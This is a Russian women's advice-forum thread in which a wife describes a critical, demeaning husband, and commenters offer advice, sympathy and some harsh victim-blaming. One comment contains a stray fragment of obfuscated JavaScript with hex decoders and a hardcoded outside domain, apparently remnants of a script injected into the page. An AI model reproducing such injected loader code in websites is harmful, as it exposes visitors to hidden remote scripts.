Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-02 17:29:05 от Гость
Здравствуйте, мне грустно от того, что я не могу общаться с одним парнем, точнее он не хочет что б я была его девушка, потому что я не религиозная и не следую исламу, он сам верующий, наверно вы сейчас подумаете почему я не следую исламу?, он сказал ... Подробнее
Последний комментарий
История : душь
5 минут назад2016-12-03 07:53:43 от Унесённая ветром
22968Представляю Ваше недоумения забавно получилось. Все комментарии67546
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Советы
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Лев
21 ноября в 22:04:47
Советы - История из жизни
Советы : История из жизни     Мне 36 лет. У нас с мужем двое детей. Со стороны посмотреть-идеальные отношения. Всегда и везде вместе. Наши друзья знают, что по отдельности мы никуда не ходим. Но есть такие моменты которые перечеркивают всё. Он абсолютно мне не доверяет. С кем бы мы не общались, он везде видит флирт, говорит, что я неисправима. Ещё он постоянно меня критикует, практически ежедневно, не так посмотрела, не вовремя сказала и проч. Критики так много, что меня это очень подавляет. Причём если он решил меня за что-то отсчитать, его монолог может длиться час и два, это не передать словами, хочется просто провалиться сквозь землю, исчезнуть. Если начну оправдываться или защищаться-будет ещё хуже. Он не даёт мне рта открыть. Он очень грубый, меня ранят его слова, сколько не просила не выражаться, бесполезно. Говорит, что семья держится только на нём (в моральном плане, зарабатываем мы одинаково), что я эгоистка, что ему это надоело и давно сделаны выводы. А я никак не могу понять, что со мной не так. Спрашиваю-бесполезно, оказывается я его не уважаю. Для наглядности попробую привести пример. Вчера репетировали песню, я делала ему замечания и во время репетиции жестикулируя показывала, что мне кажется неудачным (мы оставались одни). Он репетировал до 23 вечера, а нам ещё нужно было заехать по делам. В итоге я каждый раз спрашивала "Может поедем?". Дома были во втором часу ночи. Он тут же за компьютер и бросает ч/з плечо, мол, разогрей еду (оговорюсь, он в отпуске, мне на след.день с утра на работу), разогрела, поели. Он опять за комп. Включен тв и свет, спрашиваю "Я свет выключу?", он "Вот не можешь же ты по-нормальному, дорогой, ты не против, если я выключу свет?". А потом пошло-поехало: на репетиции я его тащила домой и рожа у меня была недовольная, и зачем ему замечания делала во время репетиции, это неуважение (хотела как лучше). Говорю, что нормальная я была, он "тебя надо было зеркало дать, чтоб ты свою харю увидела!". И почему меня всё время тянет домой, а когда с друзьями, то меня не тянет, почему я не хочу быть именно с ним, отвечаю, так ведь дома-то мы будем вместе, вдвоем (где логика?). Да, возможно, я была не в восторге от идеи на столько времени задерживаться, но разве это повод на меня кричать?! Он постоянно говорит как мантру как мне с ним повезло, что он один на миллион, он даже не стесняется и то же самое говорит в компании. Знаю, кто-то напишет, что мой выбор, не хочешь-не живи. Я его люблю и не хочу разбегаться, но хочу избавиться от этого давления и унижения. такой период был (точнее это постоянно, но бывают обострения как сейчас), я долго терпела и молчала, пока однажды не сказала, что не о такой жизни я мечтала и грош цена такому браку. Потом довольно долго он был не агрессивным, добрым. в нем есть что-то от садиста. Он радуется, когда делает что-то неприятное. Вот пример. Жму от груди штангу, взяла вес побольше и попросила подстраховать, он придерживает гриф и на меня падает его пот (только пришёл с кардио), делаю замечание (ну невозможно не чувствовать как по лицу течёт пот), он его не вытирает и вторая капля попадаем прямо мне в глаз. Да, ему это кажется смешным. Спрашиваю совета (на психолога денег нет), какую линию поведения мне выбрать. Либо терпеть, подыгрывать, или пресекать такие вещи сразу, а может вообще внутренне забаррикадироваться и отстраниться. Говорить бесполезно (повторюсь) он любое не то что замечание, но даже пожелание воспринимает как удар. У него очень болезненное самолюбие.
65205
Другие Советы
(31)
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
24 июня 23:28:19
2016-06-24 23:28:19

Какую бы тактику вы не избрали, он не поменяется . И потом он уже сел вам на голову и погоняет. Будите молчать он начнет хаметь больше, станете отвечать ему будут скандалы каждый день. Он человек такой. Если только он поймет свою проблему, только тогда можно исправить его поведение. А без этого вы ничего ему не докажите. Он лучший в его понимании, а вы там где-то внизу

Ответить
Поддерживаю Да5 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Рыбья башка
Рыбья башка

24 июня 23:44:43
2016-06-24 23:44:43
Фу какой же омерзительный у вас муж. Читала и думаю, что мой просто идеальный божий одуванчик. Так с собой я бы не позволила обращаться никому. Такая уж вот я. А вы просто чудик. Такие меня удивляют. Я не могу вам ничего посоветовать. Никакие линии. Никакие пути. Я бы просто не смогла с таким существом жить. Всегда думаю, мама и папа не для этого меня растили, чтоб какой то чморик со мной так обращался. Ну уж слишком себя уважаю для этого. Противно от вашей истории стало.
Ответить
Поддерживаю Да4 / Нет0
Allegro
21105 Allegro
allegro offline
Репутация : 138787
Комментариев 1455 11
24 июня 23:50:08
2016-06-24 23:50:08
Тоже неприятное впечатление от вашего мужа. Странное поведение, странное чувство юмора. Не хочу вас обидеть, но в истории он ввглядит шизофреником.
Ответить
Поддерживаю Да3 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
24 июня 23:58:16
2016-06-24 23:58:16

Allegro, не думаю, что он шизофреник... просто избалованный и самовлюбленный тип! Автору не позавидуешь

Ответить
Поддерживаю Да1 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Allegro
21105 Allegro
allegro offline
Репутация : 138787
Комментариев 1455 11
25 июня 00:09:31
2016-06-25 00:09:31
Dead end, я конечно не врач, чтоб разбрасываться диагнозами, поэтому пишу, что выглядит как, я образно выразилась. На бытовом уровне. В смысле, что видит везде умысел, подозрителен, ревнив. Любит провоцировать и выводить из себя
Ответить
Поддерживаю Да1 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
LOVEDOG
16856 LOVEDOG
LOVEDOG offline
Репутация : 110546
Комментариев 1856 16
25 июня 00:12:04
2016-06-25 00:12:04
Он как энергетический вампир, высасывает из Вас энергетику. Может как-то разорвать брак?Это ж невыносимо, Вы убивает свою жизнь ради упреков, а Ваш муж только и рад, я уверен на, что он получает от этого удовольствия.
Ответить
Поддерживаю Да1 / Нет0
Чем безупречнее человек кажется снаружи, тем больше демонов у него внутри. © Зигмунд Фрейд
Боровцова
18583 Боровцова
Боровцова offline
Репутация : 12226
Комментариев 152 0
25 июня 01:34:43
2016-06-25 01:34:43

Пот попадает в глаз ахахах {#} на самом деле смешно {#}

Ответить
Поддерживаю Да0 / Нет3
Empress
21626 Empress
Empress offline
Репутация : 3961
Комментариев 88 3
25 июня 02:03:12
2016-06-25 02:03:12

Какие советы вы просите, если вы сами себе ответили в своей же истории? Все ответы у вас есть: это Ваш выбор - хочешь живи, хочешь разбегайся, разбегаться не хочу, люблюнемогу, есть в нем что- то от садиста, но разбегаться все равно не хочу. Ну тут все понятно, вроде бы. Есть вечная жертва, есть садист. Всех всё устраивает. Ни слова хорошего о муже во всей истории и все равно - люблю , разбегаться не хочу. Или вы думаете вам тут совет дадут дистанционно как мужа переделать? Так не переделается он. Поэтому , нравится жить - живите. Не нравится - не живите.

Ответить
Поддерживаю Да3 / Нет0
"Бойся страха своего " - моя мистическая история на самиздате, гугл в помощь.
Штучка
21311 Штучка
Штучка offline
Репутация : 40938
Комментариев 962 0
25 июня 02:35:42
2016-06-25 02:35:42
Ваш муж - энергетический вампир, сочетающий в себе черты нескольких типов: эгоиста, который не считается с вашими потребностями и нуждами; манипулятора, который постоянно "промывает мозги"; критикана, который разрушает в вас веру в себя и понижает самооценку, и нытика, который вызывает головную боль и чувство вины непонятно, за что. Если отношения с ним в роли "жертвы-донора" вас устраивают, - остаётся только сознательно терпеть, сколько хватит сил. Такие люди не унимаются надолго.
Ответить
Поддерживаю Да1 / Нет0
Видеть в чудесном чудесное - вот ключ ко всем тайнам мира. Лао - Цзы
Лисичка
Лисичка

25 июня 10:20:06
2016-06-25 10:20:06
Похоже что муж у вас домашний тиран да еще к тому же зануда. Терпеть не могу когда мужчина критикует свою жену и цепляется по мелочам. Есть у меня такой родственник, всегда смотрю на его жену и думаю: как она с ним живет? я бы наверно давно сбежала. И вообще вы не написали, вы себя словесно защищаете, даете ему отпор, или только молчите, терпите и оправдываетесь?
Ответить
Поддерживаю Да0 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
25 июня 11:20:49
2016-06-25 11:20:49

Какие нафиг "линии" ему по роже надо чайником, а не пути обхода его недовольства искать. Какой мерзкий говнюк, фу, аж затошнило.

Ответить
Поддерживаю Да1 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Гость
Гость

25 июня 11:30:44
2016-06-25 11:30:44
Меня всегда поражают такие "терпилы". Сначала позволяют обращаться с собой как с половой тряпкой, годами терпят, а потом на сайтах жалости ищут и советы спрашивают. Гражданка! У нас свободная страна! Не нравится - развернулась и на выход с вещами. Развод и девичья фамилия. В 36 лет пора бы и ума нажить. Ни одного слова хорошего про мужика не написала, а живешь с ним. Чего живешь, спрашивается, если так хреново? А, любишь ты его. Ну, тут каждому своё. Значит, для тебя это нормально - ВОТ ТАКОГО любить. Тут уже не его, тут твои проблемы. Это у тебя любовь к садистам и моральным уродам развита. Так что, виноватых в этой истории нет - садист нашел терпилу - и вот она, сладкая парочка. Совет да любовь!
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

25 июня 11:52:54
2016-06-25 11:52:54
Empress, моей целью было показать что меня не устраивает поэтому осознанно не писала о нём то, что устраивает. Да, люблю и не собираюсь рвать, но я писала что меня это НЕ устраивает, вы упустили (вероятно тоже осознанно). По поводу изменить его, я знаю, что никого мы изменить не можем кроме себя. Также я знаю, что поменяв свою линию поведения, можно изменить отношение к себе. И такое у меня было с многочисленными знакомыми и "подружками", часть которых отсеялась, и с коллегами на работе (когда терпение лопнуло и меня начали уважать). Неужели вы сами не видите очевидных вещей?! Возьмите к примеру любого знакомого вам человека (или себя) и посмотрите как меняется отношение в зависимости от того с кем приходится общаться. Поэтому я и спрашивала совета как мне себя вести, а не волшебный эликсир по изменению мужа ))) Dead end, увы я ощущаю так же. Рыбья башка, спасибо за чудика и существо. Наверное действительно у вас идеальная семья и вы идеальные люди раз позволяете себе такие эпитеты. Allegro, вы попали в точку. После многочисленных командировок и боевых операций он мне в этом признавался, это побочный эффект человека, живущего на грани жизни и смерти, кто-то справляется, кто-то не очень. Штучка, да, всё верно. Меня это не устраивает. Я не жертва, а когда я не жертва, то автоматически жертва он! Меня достала эта дебильная игра и хочу поменять правила. Лисичка, да он зануда, терпеть не могу это качество (оно встречается ооооочень у многих людей). Когда человек, говоря прописные истины, тешит своё чувство важности. Лисичка, т. к. ненавижу конфликты и любые разборки я обычно молчу или просто говорю что мне это не нравится (наверное это и есть моя ошибка по отношению к людям вообще). Он вместо того чтобы успокоится продолжает до тех пор пока сам себя не накрутит и не выпустит пар (я чем-то (!) недовольна, значит мне интереснее с друзьями в компании а не с ним, я его не люблю и проч. и проч. и вообще пока я молода и хороша, могу найти себе нормального мужика и он будет только счастлив (фу, меня прям трясёт от этого бреда и его неуверенности)). Либо когда у меня терпение заканчивается, я могу взорваться. Так и было в спортзале. На меня упала капля пота (и последняя капля в чаше терпения)и тут я разразилась таким матом, забыв про приличия и окружающих. Он от меня отскочил и всю тренировку не подходил вообще. Зато на след. тренировке, очень подробно объяснял новое упр. на плечи, да и любезнее был (подействовало же!). Спасибо вам всем! Теперь я знаю как себя вести. Придётся на каждое действие-моментальное противодействие. Ему будет психологически невыгодно меня раздражать. Мне сложно это делать, это противоречит моему нутру. Но придётся во имя себя же!
Ответить
Поддерживаю Да2 / Нет0
Empress
21626 Empress
Empress offline
Репутация : 3961
Комментариев 88 3
25 июня 13:13:55
2016-06-25 13:13:55

Таня, цитирую Вас " Неужели вы сами не видите очевидных вещей?! Возьмите к примеру любого знакомого вам человека (или себя) и посмотрите как меняется отношение в зависимости от того с кем приходится общаться. "

Таня, я понимаю о чем Вы говорите, но это не мой случай. Я позволяю себе роскошь не общаться с неприятными мне людьми кем бы они ни были в моей жизни и какие бы родственные или деловые связи нас не связывали. Со мной никто не может обращаться так, как с Вами обращается муж. Просто потому, что я ценю себя и уважаю. А Вы уважаете себя? Цените? И не надо мне тут сказки про любовь рассказывать. Любовь - это когда обоих всё устраивает и оба принимают друга какими есть, обоим комфортно и не надо ради кого-то менять себя и идти наперекор своей натуре. У Вас в семье так?

Ведь Ваш муж обращается так не со всеми людьми? Значит это ВЫ позволяете ему так с вами обращаться. Изменив линию поведения Вы, возможно и добьетесь каких-то изменений в Ваших отношениях, но не факт, что тех, которых ждете. Мужу комфортно с Вами именно с такой - с "девочкой для битья", на которой он упражняется в поднятии своей самооценки и к которой относится не как к нежной возлюбленной, а совсем по-другому. Если Вы изменитесь, ему это может не понравиться. Учитывайте это. И если Вы его так сильно любите и не готовы расходиться, а готовы тратить свою жизнь на то, чтобы меняться самой и делать то, что противоречит Вашему нутру, надеясь, что это изменит отношение к Вам другого человека, я желаю Вам удачи. Но запомните одну простую истину: мы имеет то, что заслуживаем. И все равно - УДАЧИ!

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
"Бойся страха своего " - моя мистическая история на самиздате, гугл в помощь.
Таня
Таня

25 июня 13:13:57
2016-06-25 13:13:57
Гость, Ваш монолог-отличнейший пример человека у которого желание что-то сказать преобладает над возможностью это сделать ))). Какое счастье что есть такие люди! Вы, как тренажер в зале, как груша для отточки удара. Самое забавное, что вы даже не понимаете в пылу своей тирады что вообще происходит, но ваши реакции вполне удовлетворяют меня. Спасибо!
Ответить
Поддерживаю Да0 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895502
Комментариев 17167 30
25 июня 13:52:47
2016-06-25 13:52:47

Уже поздно что либо исправлять. Расставлять рамки дозволенного нужно с самых азов отношений. Когда люди узнают друг друга и проверяют, что можно позволять в сторону того или иного человека? Так сказать, прощупывают почву. вы в своё время упустили момент и не пресекли это на корню. Вот теперь пожинаете плоды. Ваш мужчина, в отличии от Вас, как раз таки поставил рамки дозволенного. Поэтому Вы прекрасно знаете, что он не позволяет в свою сторону и стараетесь избегать этого.

Сейчас Вам остаётся смириться. И жить как раньше. Периодическими своими возмущениями на некоторые вещи, вы лишь на некоторое время сможете его утихомиривать, а потом всё снова будет возвращаться на круги своя.

Ответить
Поддерживаю Да2 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

25 июня 14:00:48
2016-06-25 14:00:48
Таня, Таня, тренажер в зале, как груша для отточки удара - это ты. Не путай понятия. Это не меня муж ни во что не ставит и гоняет как шавку, это он с тобой проделывает
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

25 июня 14:00:50
2016-06-25 14:00:50
Блондиночка , согласен 100%
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

25 июня 14:57:23
2016-06-25 14:57:23
Empress, вынуждена признать что вы правы. Как бы то ни было, я больше не хочу чтобы он самоутверждался за мой счёт. Да, у меня проблемы с самооценкой, детские комплексы, с которыми мало-помалу расправляюсь. Властная мама, которая всегда меня считала непутёвой и все мои мечты высмеивала. С мамой уже давно наладила отношения, конечно они не такие тёплые как мне хотелось бы, но сделала что могла (поставила рамки, но её всё равно все раздражает чем бы я не занималась раньше это было рисование, рассказы, сейчас спорт зал, музыка). Спасибо.
Ответить
Поддерживаю Да0 / Нет0
Нежная роза
8829 Нежная роза
Нежная роза offline
Репутация : 154526
Комментариев 2288 27
25 июня 17:04:02
2016-06-25 17:04:02

Автор приняла верное решение - не терпеть, молчать или оправдываться, а достойно отвечать. Похоже, это работает, раз муж меняет поведение, хоть и ненадолго. Удачи! Я верю, что у тебя получится.

Ответить
Поддерживаю Да0 / Нет0
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
белая мышка
9141 белая мышка
Белая мышка offline
Репутация : 141390
Комментариев 1502 25
25 июня 18:00:42
2016-06-25 18:00:42

Блондиночка , вот полностью поддерживаю тебя.

В отношениях надо изначально показать себя, свое Я. А то сначала пресмыкаются перед мужчиной, а потом пытаются что-то поменять, потому что тот уже на шею сел.

Моего тоже иногда клинит. И в некоторых ссорах он так же как бы себя начинает превозносить, но в отличае от Вас, я его могу, мягко сказать, приопустить. Так как изначально не "стелилась". Иногда он даже говорит-Как бы я хотел чтобы у меня была послушная жена. А я ему говорю-Таких жен мужья не уважают, и интерес проходит довольно быстро.

А по поводу разогреть покушать... руки ноги есть-вперед. Я наготовила, а погреть сам сможешь.

Ответить
Поддерживаю Да1 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Рыбья башка
Рыбья башка

25 июня 20:09:30
2016-06-25 20:09:30
Да вы правы. У меня действительно идеальная семья по сравнению с гадкими выходками вашего существа.
Ответить
Поддерживаю Да0 / Нет0
Allegro
21105 Allegro
allegro offline
Репутация : 138787
Комментариев 1455 11
25 июня 21:04:13
2016-06-25 21:04:13
Таня, если имеет место прибывание в горячих точках, может все таки прибегнуть к помощи психолога, тем более раз муж сам признает что что-то не так. Уважаю таких мужчин, мне многое стало понятно из вашей истории. У меня был такой знакомый, тоже Чечня. Ни с одной женщиной он не мог ужиться. Только женщина-психолог нашла к нему подход, живут сейчас вместе
Ответить
Поддерживаю Да0 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Allegro
21105 Allegro
allegro offline
Репутация : 138787
Комментариев 1455 11
25 июня 21:11:32
2016-06-25 21:11:32
Жизнь на пределе действительно оставляет отпечаток. Вы молодец что стремитесь разобраться.
Ответить
Поддерживаю Да0 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Xelen
21144 Xelen
Xelen offline
Репутация : 35911
Комментариев 436 1
25 июня 21:58:14
2016-06-25 21:58:14

У меня муж тоже похожее откатывает, правда у него это в довольно невинной форме получается, без оскорблений и унижений. Вот просто морально доканывает всякой фигней. И этот эгоизм тоже порой. Мне помогает хорошенький такой скандал, дать ему конкретно проср###ся))) Тогда с недельку идеальный муж. Потом снова придумывает почву и снова доводит до скандала. Этакий пингпонг получается)) Но мне в какой-то мере даже нравится эта "игра". Муж кст тоже на войне был... Вам бы постараться найти в этом нечто позитивное, иначе толку с отношений не будет

Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

25 июня 23:11:59
2016-06-25 23:11:59
Нежная роза, спасибо.
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

25 июня 23:12:03
2016-06-25 23:12:03
Allegro, слава Богу командировки закончились. Он очень многое сумел преодолеть. Раньше было много труднее. Так смешно я выставила себя ну прям овечкой. Конечно по разному бывало. Однажды сорвалась и уматала одна на юг. Он долго не мог простить.
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

25 июня 23:12:11
2016-06-25 23:12:11
Xelen, придётся тоже давать отпор. Обидно что с самым близким человеком нужно всё равно быть начеку. А хочется расслабленности и безмятежности.
Ответить
Поддерживаю Да0 / Нет0
Таня
Таня

25 июня 23:12:17
2016-06-25 23:12:17
белая мышка, я никогда не присмыкалась и не стелилась. И в ссорах мне просто очень грустно, я никогда не плачу, когда невозможно уже слушать в пиковой точке затыкаю уши и начинаю петь.
Ответить
Поддерживаю Да0 / Нет0
Bert
20913 Bert
Bert offline
Репутация : 121211
Комментариев 1156 0
27 июня 02:21:55
2016-06-27 02:21:55

А зачем вы всё это терпите? Что заставляет терпеть всё, что с вами происходит. А главное ради чего, и к чему в дальнейшем это приведёт. Если терпите, значит вам не так уж плохо!

Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина online
Репутация : 441737
Комментариев 7599 30
27 июня 09:40:26
2016-06-27 09:40:26

Таня, Если сейчас он такой то представь каким он в старости будет. В преклонном возрасте все усилится только.

Дело твое. Каждая сама себе выбирает с кем ей жить. Только ставить его на место. Больше никак.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке